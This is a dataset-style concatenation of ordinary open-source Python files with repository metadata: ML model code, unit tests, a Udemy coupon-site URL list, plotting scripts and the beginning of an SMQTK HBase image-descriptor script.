511cba785414c0fa94176b5261d2ca7355db897a | 1,743 | py | Python | kglib/kgcn/models/embedding.py | lolski/kglib | 2265009bc066454accb88cdaad8769b920d5df39 | [
"Apache-2.0"
] | null | null | null | kglib/kgcn/models/embedding.py | lolski/kglib | 2265009bc066454accb88cdaad8769b920d5df39 | [
"Apache-2.0"
] | null | null | null | kglib/kgcn/models/embedding.py | lolski/kglib | 2265009bc066454accb88cdaad8769b920d5df39 | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import tensorflow as tf
import sonnet as snt
from kglib.kgcn.models.typewise import TypewiseEncoder
def common_embedding(features, num_types, type_embedding_dim):
preexistance_feat = tf.expand_dims(tf.cast(features[:, 0], dtype=tf.float32), axis=1)
type_embedder = snt.Embed(num_types, type_embedding_dim)
type_embedding = type_embedder(tf.cast(features[:, 1], tf.int32))
return tf.concat([preexistance_feat, type_embedding], axis=1)
def attribute_embedding(features, attr_encoders, attr_embedding_dim):
typewise_attribute_encoder = TypewiseEncoder(attr_encoders, attr_embedding_dim)
return typewise_attribute_encoder(features[:, 1:])
def node_embedding(features, num_types, type_embedding_dim, attr_encoders, attr_embedding_dim):
return tf.concat([common_embedding(features, num_types, type_embedding_dim),
attribute_embedding(features, attr_encoders, attr_embedding_dim)], axis=1)
| 43.575 | 96 | 0.769937 |
19e12d057783bf2f5a920da0463e6f7e3948b1c0 | 1,764 | py | Python | __constants/constants.py | priyanshuga/Automatic-Udemy-Courses-Grabber | 44426ca2b7b9cb4f18196e12d4d3096baf2b8154 | [
"MIT"
] | null | null | null | __constants/constants.py | priyanshuga/Automatic-Udemy-Courses-Grabber | 44426ca2b7b9cb4f18196e12d4d3096baf2b8154 | [
"MIT"
] | null | null | null | __constants/constants.py | priyanshuga/Automatic-Udemy-Courses-Grabber | 44426ca2b7b9cb4f18196e12d4d3096baf2b8154 | [
"MIT"
] | null | null | null | ########## SITEWIDE CONSTANTS ############
animation = ["[■□□□□□□□□□□□□□]", "[■■□□□□□□□□□□□□]", "[■■■□□□□□□□□□□□]", "[■■■■□□□□□□□□□□]", "[■■■■□□□□□□□□□□]", "[■■■■■□□□□□□□□□]",
"[■■■■■■□□□□□□□□]", "[■■■■■■■□□□□□□□]", "[■■■■■■■■□□□□□□]", "[■■■■■■■■■□□□□□]", "[■■■■■■■■■□□□□]", "[■■■■■■■■■■□□□]", "[■■■■■■■■■■■□□]", "[■■■■■■■■■■■■□]", "[■■■■■■■■■■■■■]"]
DISCUD = 'https://www.discudemy.com/all/'
UDEMYFREEBIES = 'https://www.udemyfreebies.com/free-udemy-courses/'
UDEMYCOUPONS = 'https://udemycoupons.me/'
REALDISC = 'https://www.real.discount/product-tag/100-off/page/'
LEARNVIR = 'https://udemycoupon.learnviral.com/coupon-category/free100-discount/page/'
TRICKSINF = 'https://tricksinfo.net/page/'
WEBCART = 'https://www.freewebcart.com/page/'
COURSEMANIA = 'https://api.coursemania.xyz/api/get_courses'
HELPCOV = 'https://asia-east2-myhelpcovid19.cloudfunctions.net/app/courses?pagesize=50&source=udemy'
JOJOCP = 'https://jojocoupons.com/category/udemy/page/'
ONLINETUT = 'https://udemycoupon.onlinetutorials.org/page/'
CHECKOUT = 'https://www.udemy.com/payment/checkout-submit/'
FREE_ENROLL1 = 'https://www.udemy.com/api-2.0/users/me/subscribed-courses/?fields%5Buser%5D=title%2Cimage_100x100&fields%5Bcourse%5D=title%2Cheadline%2Curl%2Ccompletion_ratio%2Cnum_published_lectures%2Cimage_480x270%2Cimage_240x135%2Cfavorite_time%2Carchive_time%2Cis_banned%2Cis_taking_disabled%2Cfeatures%2Cvisible_instructors%2Clast_accessed_time%2Csort_order%2Cis_user_subscribed%2Cis_wishlisted'
total_sites = [
'Discudemy',
'Udemy Freebies',
'Udemy Coupons',
#'Real Discount',
#'Tricks Info',
#'Free Web Cart',
'Course Mania',
#'Jojo Coupons',
"Online Tutorials"
]
site_range = [ 3, 3, 2,
#5, 6, 7,
2, # 4,
4]
| 47.675676 | 400 | 0.60941 |
4ba4e0af2158066f2a17b8af43dc42fa8735599d | 1,414 | py | Python | jiant/utils/string_comparing.py | yzpang/jiant | 192d6b525c06f33010b59044df40cb86bbfba4ea | [
"MIT"
] | 1,108 | 2019-04-22T09:19:19.000Z | 2022-03-31T13:23:51.000Z | jiant/utils/string_comparing.py | eric11eca/inference-information-probing | f55156201992cb024edf112e06dd2d7fe09381e4 | [
"MIT"
] | 737 | 2019-04-22T14:30:36.000Z | 2022-03-31T22:22:17.000Z | jiant/utils/string_comparing.py | eric11eca/inference-information-probing | f55156201992cb024edf112e06dd2d7fe09381e4 | [
"MIT"
] | 273 | 2019-04-23T01:42:11.000Z | 2022-03-25T15:59:38.000Z | import re
import string
import collections
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace.
From official ReCoRD eval script
"""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def string_f1_score(prediction, ground_truth):
"""Compute normalized token level F1
From official ReCoRD eval script
"""
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = collections.Counter(prediction_tokens) & collections.Counter(ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def exact_match_score(prediction, ground_truth):
"""Compute normalized exact match
From official ReCoRD eval script
"""
return normalize_answer(prediction) == normalize_answer(ground_truth)
| 29.458333 | 94 | 0.694484 |
27a967b578cd31a729c0fed37c1ffdfe1bda3c9e | 12,036 | py | Python | dual_encoder/keras_layers_test.py | Abhin02/federated | 5fd8f69284c2784b635faadfaf6c66ce843f7701 | [
"Apache-2.0"
] | 1 | 2022-03-16T02:13:39.000Z | 2022-03-16T02:13:39.000Z | dual_encoder/keras_layers_test.py | notminusone/federated | 6a709f5598450232b918c046cfeba849f479d5cb | [
"Apache-2.0"
] | null | null | null | dual_encoder/keras_layers_test.py | notminusone/federated | 6a709f5598450232b918c046cfeba849f479d5cb | [
"Apache-2.0"
] | null | null | null | # Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import absltest
import tensorflow as tf
from dual_encoder import keras_layers
l2_normalize_fn = lambda x: tf.keras.backend.l2_normalize(x, axis=-1)
class KerasLayersTest(absltest.TestCase):
def test_masked_average_3d(self):
masked_average_layer = keras_layers.MaskedAverage(1)
inputs = tf.constant([
[[0.5, 0.3], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]],
[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
])
mask = tf.constant([[True, True, True],
[False, False, True],
[True, False, False],
[False, False, False]])
output_average = masked_average_layer.call(inputs, mask=mask)
output_mask = masked_average_layer.compute_mask(inputs, mask=mask)
expected_average = tf.constant([
[1.3 / 3, 0.5 / 3],
[0.4, 0.1],
[0.9, 0.4],
[0.0, 0.0]
])
expected_mask = None
tf.debugging.assert_near(expected_average, output_average)
self.assertEqual(expected_mask, output_mask)
def test_masked_average_4d(self):
masked_average_layer = keras_layers.MaskedAverage(2)
inputs = tf.constant([
[[[0.5, 0.3], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
[[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
[[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
[[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
])
mask = tf.constant([[[True, True, True], [True, False, True]],
[[False, False, True], [False, False, False]],
[[True, False, False], [True, True, True]],
[[False, False, False], [True, False, False]]])
output_average = masked_average_layer.call(inputs, mask=mask)
output_mask = masked_average_layer.compute_mask(inputs, mask=mask)
expected_average = tf.constant([
[[1.3 / 3, 0.5 / 3], [0.5, 0.45]],
[[0.4, 0.1], [0.0, 0.0]],
[[0.9, 0.4], [0.5, 1.3 / 3]],
[[0.0, 0.0], [0.6, 0.8]],
])
expected_mask = tf.constant([[True, True],
[True, False],
[True, True],
[False, True]])
tf.debugging.assert_near(expected_average, output_average)
tf.debugging.assert_equal(expected_mask, output_mask)
def test_masked_average_raises_error(self):
masked_average_layer = keras_layers.MaskedAverage(1)
inputs = tf.constant([
[[0.5, 0.3], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]],
[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
])
mask = None
with self.assertRaises(ValueError):
masked_average_layer.call(inputs, mask=mask)
with self.assertRaises(ValueError):
masked_average_layer.compute_mask(inputs, mask=mask)
def test_masked_average_get_config(self):
masked_average_layer = keras_layers.MaskedAverage(1)
config = masked_average_layer.get_config()
self.assertEqual(config['axis'], 1)
def test_masked_reshape(self):
masked_reshape_layer = keras_layers.MaskedReshape((4, 4, 2, 1), (4, 4, 2))
inputs = tf.constant([
[[1.0], [2.0], [0.5], [0.4], [0.4], [0.1], [0.0], [0.0]],
[[0.4], [0.1], [0.0], [0.0], [0.0], [0.0], [0.6], [0.8]],
[[0.9], [0.4], [0.5], [3.0], [0.9], [0.4], [0.5], [3.0]],
[[0.0], [0.0], [0.6], [0.8], [0.4], [0.1], [0.0], [0.0]],
])
mask = tf.constant(
[[True, False, True, True, True, False, False, False],
[True, False, True, True, True, True, False, True],
[False, True, True, False, True, True, True, True],
[False, True, True, True, True, False, False, True]])
output = masked_reshape_layer.call(inputs, mask=mask)
output_mask = masked_reshape_layer.compute_mask(inputs, mask=mask)
expected_output = tf.constant([
[[[1.0], [2.0]], [[0.5], [0.4]], [[0.4], [0.1]], [[0.0], [0.0]]],
[[[0.4], [0.1]], [[0.0], [0.0]], [[0.0], [0.0]], [[0.6], [0.8]]],
[[[0.9], [0.4]], [[0.5], [3.0]], [[0.9], [0.4]], [[0.5], [3.0]]],
[[[0.0], [0.0]], [[0.6], [0.8]], [[0.4], [0.1]], [[0.0], [0.0]]],
])
expected_mask = tf.constant(
[[[True, False], [True, True], [True, False], [False, False]],
[[True, False], [True, True], [True, True], [False, True]],
[[False, True], [True, False], [True, True], [True, True]],
[[False, True], [True, True], [True, False], [False, True]]])
tf.debugging.assert_near(expected_output, output)
tf.debugging.assert_equal(expected_mask, output_mask)
def test_masked_reshape_unknown_batch_size(self):
masked_reshape_layer = keras_layers.MaskedReshape((-1, 4, 2, 1), (-1, 4, 2))
inputs = tf.constant([
[[1.0], [2.0], [0.5], [0.4], [0.4], [0.1], [0.0], [0.0]],
[[0.4], [0.1], [0.0], [0.0], [0.0], [0.0], [0.6], [0.8]],
[[0.9], [0.4], [0.5], [3.0], [0.9], [0.4], [0.5], [3.0]],
[[0.0], [0.0], [0.6], [0.8], [0.4], [0.1], [0.0], [0.0]],
])
mask = tf.constant(
[[True, False, True, True, True, False, False, False],
[True, False, True, True, True, True, False, True],
[False, True, True, False, True, True, True, True],
[False, True, True, True, True, False, False, True]])
output = masked_reshape_layer.call(inputs, mask=mask)
output_mask = masked_reshape_layer.compute_mask(inputs, mask=mask)
expected_output = tf.constant([
[[[1.0], [2.0]], [[0.5], [0.4]], [[0.4], [0.1]], [[0.0], [0.0]]],
[[[0.4], [0.1]], [[0.0], [0.0]], [[0.0], [0.0]], [[0.6], [0.8]]],
[[[0.9], [0.4]], [[0.5], [3.0]], [[0.9], [0.4]], [[0.5], [3.0]]],
[[[0.0], [0.0]], [[0.6], [0.8]], [[0.4], [0.1]], [[0.0], [0.0]]],
])
expected_mask = tf.constant(
[[[True, False], [True, True], [True, False], [False, False]],
[[True, False], [True, True], [True, True], [False, True]],
[[False, True], [True, False], [True, True], [True, True]],
[[False, True], [True, True], [True, False], [False, True]]])
tf.debugging.assert_near(expected_output, output)
tf.debugging.assert_equal(expected_mask, output_mask)
def test_masked_reshape_raises_error(self):
masked_reshape_layer = keras_layers.MaskedReshape((-1, 4, 2, 1), (-1, 4, 2))
inputs = tf.constant([
[[1.0], [2.0], [0.5], [0.4], [0.4], [0.1], [0.0], [0.0]],
[[0.4], [0.1], [0.0], [0.0], [0.0], [0.0], [0.6], [0.8]],
[[0.9], [0.4], [0.5], [3.0], [0.9], [0.4], [0.5], [3.0]],
[[0.0], [0.0], [0.6], [0.8], [0.4], [0.1], [0.0], [0.0]],
])
mask = None
with self.assertRaises(ValueError):
masked_reshape_layer.call(inputs, mask=mask)
with self.assertRaises(ValueError):
masked_reshape_layer.compute_mask(inputs, mask=mask)
def test_masked_reshape_get_config(self):
masked_reshape_layer = keras_layers.MaskedReshape((-1, 4, 2, 1), (-1, 4, 2))
config = masked_reshape_layer.get_config()
self.assertEqual(config['new_inputs_shape'], (-1, 4, 2, 1))
self.assertEqual(config['new_mask_shape'], (-1, 4, 2))
def test_embedding_spreadout_regularizer_dot_product(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=None,
l2_regularization=0.0)
# Similarities without diagonal looks like:
# 0.0 2.0 0.1 0.3 0.0
# 2.0 0.0 1.2 1.2 2.0
# 0.1 1.2 0.0 0.1 0.2
# 0.3 1.2 0.1 0.0 0.2
# 0.0 2.0 0.2 0.2 0.0
loss = regularizer(weights)
# L2 norm of above similarities.
expected_loss = 0.47053161424
tf.debugging.assert_near(expected_loss, loss)
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=None,
l2_regularization=1.0)
l2_regularizer = tf.keras.regularizers.l2(1.0)
loss = regularizer(weights)
expected_loss = 0.47053161424 + l2_regularizer(weights)
tf.debugging.assert_near(expected_loss, loss)
def test_embedding_spreadout_regularizer_cosine_similarity(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=l2_normalize_fn,
l2_regularization=0.0)
loss = regularizer(weights)
# L2 norm of above similarities.
expected_loss = 0.2890284
tf.debugging.assert_near(expected_loss, loss)
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=l2_normalize_fn,
l2_regularization=1.0)
l2_regularizer = tf.keras.regularizers.l2(1.0)
loss = regularizer(weights)
expected_loss = 0.2890284 + l2_regularizer(weights)
tf.debugging.assert_near(expected_loss, loss)
def test_embedding_spreadout_regularizer_no_spreadout(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=None,
l2_regularization=0.0)
loss = regularizer(weights)
expected_loss = 0.0
tf.debugging.assert_near(expected_loss, loss)
# Test that L2 normalization behaves normally.
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=None,
l2_regularization=0.1)
l2_regularizer = tf.keras.regularizers.l2(0.1)
loss = regularizer(weights)
l2_loss = l2_regularizer(weights)
tf.debugging.assert_near(l2_loss, loss)
# Test that normalization_fn has no effect.
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=l2_normalize_fn,
l2_regularization=0.1)
l2_regularizer = tf.keras.regularizers.l2(0.1)
loss = regularizer(weights)
l2_loss = l2_regularizer(weights)
tf.debugging.assert_near(l2_loss, loss)
def test_embedding_spreadout_regularizer_get_config(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=l2_normalize_fn,
l2_regularization=0.1)
config = regularizer.get_config()
expected_config = {
'spreadout_lambda': 0.0,
'normalization_fn': l2_normalize_fn,
'l2_regularization': 0.1
}
new_regularizer = (
keras_layers.EmbeddingSpreadoutRegularizer.from_config(config))
l2_regularizer = tf.keras.regularizers.l2(0.1)
loss = new_regularizer(weights)
l2_loss = l2_regularizer(weights)
self.assertEqual(config, expected_config)
tf.debugging.assert_near(l2_loss, loss)
if __name__ == '__main__':
absltest.main()
| 35.821429 | 80 | 0.571868 |
716215b5f34434c9d265401560bc6fbf4dc58b53 | 1,910 | py | Python | PySiddhi/core/stream/input/InputHandler.py | localstack/PySiddhi | 8f16c5f25908aa6ff94fb3cd256c3d47b6ee3ab2 | [
"Apache-2.0"
] | 13 | 2019-03-19T11:28:59.000Z | 2022-02-22T10:52:44.000Z | PySiddhi/core/stream/input/InputHandler.py | localstack/PySiddhi | 8f16c5f25908aa6ff94fb3cd256c3d47b6ee3ab2 | [
"Apache-2.0"
] | 8 | 2019-06-18T11:56:11.000Z | 2021-08-17T11:22:58.000Z | PySiddhi/core/stream/input/InputHandler.py | localstack/PySiddhi | 8f16c5f25908aa6ff94fb3cd256c3d47b6ee3ab2 | [
"Apache-2.0"
] | 12 | 2019-05-07T01:44:53.000Z | 2021-11-12T09:26:02.000Z | # Copyright (c) 2017, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
#
# WSO2 Inc. licenses this file to you under the Apache License,
# Version 2.0 (the "License"); you may not use this file except
# in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from PySiddhi import SiddhiLoader
from PySiddhi.DataTypes.DataWrapper import wrapData
input_handler_proxy = SiddhiLoader._loadType(
"io.siddhi.pythonapi.proxy.core.stream.input.input_handler.InputHandlerProxy")
class InputHandler(object):
'''
Handles input to SiddhiAppRuntime.
Wrapper on io.siddhi.core.stream.input.InputHandler
'''
def __init__(self):
raise NotImplementedError("Initialize InputHandler using SiddhiAppRuntime")
def __new__(cls):
bare_instance = object.__new__(cls)
bare_instance.input_handler_proxy = None
return bare_instance
def send(self, data):
'''
Sends data as an event to system.
:param data:
:return:
'''
wrapped_data = wrapData(data)
input_handler_proxy_inst = input_handler_proxy()
input_handler_proxy_inst.send(self.input_handler_proxy, wrapped_data)
@classmethod
def _fromInputHandlerProxy(cls, input_handler_proxy):
'''
Internal Constructor to wrap around JAVA Class InputHandler
:param input_handler_proxy:
:return:
'''
instance = cls.__new__(cls)
instance.input_handler_proxy = input_handler_proxy
return instance
| 32.931034 | 83 | 0.708901 |
7c06fa6ec47b0fd1bf3dc954788ca4424a0c3456 | 393 | py | Python | catalyst/dl/meters/__init__.py | vaklyuenkov/catalyst | 402294aa5b27784d23cee2b8fff5a1ed26dec8a8 | [
"Apache-2.0"
] | null | null | null | catalyst/dl/meters/__init__.py | vaklyuenkov/catalyst | 402294aa5b27784d23cee2b8fff5a1ed26dec8a8 | [
"Apache-2.0"
] | null | null | null | catalyst/dl/meters/__init__.py | vaklyuenkov/catalyst | 402294aa5b27784d23cee2b8fff5a1ed26dec8a8 | [
"Apache-2.0"
] | null | null | null | # flake8: noqa
from .averagevaluemeter import AverageValueMeter
from .classerrormeter import ClassErrorMeter
from .confusionmeter import ConfusionMeter
from .msemeter import MSEMeter
from .movingaveragevaluemeter import MovingAverageValueMeter
from .aucmeter import AUCMeter
from .apmeter import APMeter
from .mapmeter import mAPMeter
from .ppv_tpr_f1_meter import PrecisionRecallF1ScoreMeter
| 35.727273 | 60 | 0.872774 |
5d415393fc3e2331e79a1aa573d38c6755d36c03 | 2,786 | py | Python | burst_paper/all_ds/plot_example_ds_with_im.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | 2 | 2019-05-01T00:34:28.000Z | 2021-02-10T09:18:10.000Z | burst_paper/all_ds/plot_example_ds_with_im.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null | burst_paper/all_ds/plot_example_ds_with_im.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null |
###########
# now plot just an example of ADLeo_3 with real and imaginary components
###########
import dynspec.plot
reload(dynspec.plot)
from dynspec import load_dict
from dynspec.plot import *
from pylab import *
import os, subprocess
import matplotlib.gridspec as gridspec
params = {'legend.fontsize': 'small',
'axes.titlesize': 'small',
'axes.labelsize': 'x-small',
'xtick.labelsize': 'xx-small',
'ytick.labelsize': 'xx-small',
'image.interpolation': 'none'}
rcParams.update(params)
savefile = '/data/jrv/burst_paper/all_burst_dynspec.npy'
savedir='/data/jrv/burst_paper/adleo/'
nt = 60
nf = 32
ds_files = ['/data/jrv/15A-416/ADLeo/3/L/test_clean/ds_ap0_big_RR_n2_ms/tbavg.ms.dynspec','/data/jrv/15A-416/ADLeo/3/S/test_selfcal/ds_ap1_n3_bgsub_big/tbavg.ms.dynspec']
src = 'ADLeo'
'''
ds_obs = None
for f in ds_files:
params={'filename':f,'uniform':True}
ds = Dynspec(params)
ds.spec['i'] = (ds.spec['rr']+ds.spec['ll'])/2
ds.spec['v'] = (ds.spec['rr']-ds.spec['ll'])/2
if ds_obs is None:
ds_obs = deepcopy(ds)
else:
ds_obs.add_dynspec(ds)
del ds
#ds_obs.mask_RFI(rmsfac=5.)
ds=ds_obs.bin_dynspec(nt=nt,nf=nf,mask_partial=0.9)
'''
figure(figsize=(6.5,6.5))
n_rows = 2
n_cols = 2
gs = gridspec.GridSpec(n_rows, n_cols)
ar0 = 1.0
clf()
sub_row = 1
subplots_adjust(hspace=0.2,wspace=0)
offset = 0
# flux limits
smax = percentile(real(ds.spec['i']),98)
smax = 0.015
smin = -smax # make colorbar symmetric about zero to be consistent with Stokes V
# plot Stokes I real
i = offset + 0
subplot(gs[i])
pp = {'pol':'i','smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar','ylabel'],'ar0':ar0,'dy':0.5}
ds.plot_dynspec(plot_params=pp)
cb = gca().images[-1].colorbar
cb.remove()
gca().yaxis.set_label_coords(-0.05,-0.1)
title('Stokes I')
# plot Stokes I imag
i = offset + 1
subplot(gs[i])
pp = {'pol':'i','func':imag,'smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar'],'ar0':ar0}
ds.plot_dynspec(plot_params=pp)
gca().yaxis.set_visible(False)
cb = gca().images[-1].colorbar
cb.remove()
title('Imag(I)')
# plot Stokes V real
i = offset + 2
subplot(gs[i])
pp = {'pol':'v','smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar','xlabel'],'ar0':ar0,'dy':0.5}
ds.plot_dynspec(plot_params=pp)
#gca().yaxis.set_visible(False)
cb = gca().images[-1].colorbar
cb.remove()
gca().xaxis.set_label_coords(1.0,-0.1)
title('Stokes V')
# plot Stokes V imag
i = offset + 3
subplot(gs[i])
pp = {'pol':'v','func':imag,'smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar','cbar_label'],'ar0':ar0}
ds.plot_dynspec(plot_params=pp)
gca().yaxis.set_visible(False)
title('Imag(V)')
savefig(savedir+'ADLeo3_example_ds.pdf',bbox_inches='tight')
| 25.327273 | 170 | 0.666547 |
b81d6d1e98b2b6b8c8e39dd0cb73ba0b4ef2c0d4 | 16,043 | py | Python | scripts/memex/machine_run_scripts/hbase_gpu_machine/compute.py | cdeepakroy/SMQTK | ef5cec7399e9766f95ff06fe122471a51fc4b2d8 | [
"BSD-3-Clause"
] | 1 | 2021-04-10T10:51:26.000Z | 2021-04-10T10:51:26.000Z | scripts/memex/machine_run_scripts/hbase_gpu_machine/compute.py | cdeepakroy/SMQTK | ef5cec7399e9766f95ff06fe122471a51fc4b2d8 | [
"BSD-3-Clause"
] | 3 | 2021-06-08T22:19:14.000Z | 2022-03-12T00:46:44.000Z | scripts/memex/machine_run_scripts/hbase_gpu_machine/compute.py | DigitalCompanion/SMQTK | fc9404b69150ef44f24423844bc80735c0c2b669 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
Script controlling processing of "image_cache" table image content
via HBase (happybase module)
Notes:
- HBase scan doesn't return keys in order, so check pointing based on "highest"
key completed doesn't effectively work. There is completed key skipping,
which prevents duplicate computation, but we still have to scan the whole
HBase table, which takes a while.
"""
import happybase
import jinja2
import hashlib
import logging
import mimetypes
import multiprocessing
import multiprocessing.pool
import os
import subprocess
import tempfile
from tika import detector as tika_detector
import time
from smqtk.representation.descriptor_element.local_elements import DescriptorFileElement
import smqtk.utils.bin_utils
import smqtk.utils.factors
import smqtk.utils.file_utils
HBASE_ADDRESS = '127.0.0.1' # or an actual HBase server address
HBASE_TIMEOUT = 3600000 # one hour
HBASE_TABLE = 'image_cache'
HBASE_BINARY_COL = 'image:binary'
HBASE_BATCH_SIZE = 1000
HBASE_START_KEY = '0' * 40 # SHA1 simulation
HBASE_STOP_KEY = 'F' * 40 # SHA1 simulation
HBASE_KEY_CHECKPOINT_FILEPATH = '/data/kitware/smqtk/image_cache_cnn_compute/hbase.checkpoint.txt'
CNN_BATCH_SIZE = 2000 # Total batch of images to run in an execution of the descriptor executable at a time.
CNN_GPU_BATCH_SIZE = 100 # Number of images computed on GPU at a time
CNN_EXE = "cnn_feature_extractor"
CNN_CAFFE_MODE = '/data/kitware/caffe/source/models/bvlc_reference_caffenet/bvlc_reference_caffenet.caffemodel'
CNN_IMAGE_MEAN = '/data/kitware/smqtk/caffe_models/image_net/imagenet_mean.binaryproto'
CNN_PROTOTXT_TEMPLATE_FILE = '/data/kitware/smqtk/image_cache_cnn_compute/cnn_config.prototxt.tmpl'
CNN_PROTOTXT_TEMPLATE = jinja2.Template(open(CNN_PROTOTXT_TEMPLATE_FILE).read())
# Settings for SMQTK DescriptorFileElement construction
SMQTK_DESCRIPTOR_TYPE = 'CaffeDefaultImageNet'
SMQTK_DESCRIPTOR_SAVE_DIR = "/data/kitware/smqtk/image_cache_cnn_compute/descriptors"
SMQTK_DESCRIPTOR_DIR_SPLIT = 10
# Checkpoint information
FEED_QUEUE_MAX_SIZE = CNN_BATCH_SIZE * 2
TEMP_DIR = "/dev/shm"
mt = mimetypes.MimeTypes()
VALID_TYPES = {
'image/tiff',
'image/png',
'image/jpeg',
}
def write_to_temp(img_binary):
"""
Detect binary data content type and write to tmp file using appropriate
suffix.
:param img_binary: Image binary data as a string chunck.
:type img_binary: str
:return: Filepath to the written temp file, or None if a temp file could not be written.
:rtype: str | None
"""
log = logging.getLogger("compute.write_to_temp")
ct = tika_detector.from_buffer(img_binary)
if not ct:
log.warn("Detected no content type (None)")
return None
if ct not in VALID_TYPES:
log.warn("Invalid image type '%s'", ct)
return None
ext = mt.guess_extension(ct)
if not ext:
log.warn("Count not guess extension for type: %s", ext)
return None
fd, filepath = tempfile.mkstemp(suffix=ext, dir=TEMP_DIR)
os.close(fd)
with open(filepath, 'wb') as ofile:
ofile.write(img_binary)
return filepath
def async_write_temp((key, img_binary, out_q)):
"""
Detect binary data content type and write to tmp file using appropriate
suffix. Outputs (key, filepath) to given output Queue.
:param key: key of the element
:type key: str
:param img_binary: Image binary data as a string chunck.
:type img_binary: str
:param out_q: Output queue.
:type out_q: multiprocessing.Queue
"""
log = logging.getLogger("compute.async_write_temp[key::%s]" % key)
ct = tika_detector.from_buffer(img_binary)
if not ct:
log.warn("Detected no content type (None)")
return
if ct not in VALID_TYPES:
log.warn("Invalid image type '%s'", ct)
return
ext = mt.guess_extension(ct)
if not ext:
log.warn("Count not guess extension for type: %s", ext)
return
sha1 = hashlib.sha1(img_binary).hexdigest()
fd, filepath = tempfile.mkstemp(suffix=ext, prefix=sha1+'.', dir=TEMP_DIR)
os.close(fd)
with open(filepath, 'wb') as ofile:
ofile.write(img_binary)
out_q.put((key, filepath))
def make_descriptor(key):
"""
Make a standard DescriptorFileElement based on the given key and current
configuration.
"""
return DescriptorFileElement(SMQTK_DESCRIPTOR_TYPE, key,
SMQTK_DESCRIPTOR_SAVE_DIR,
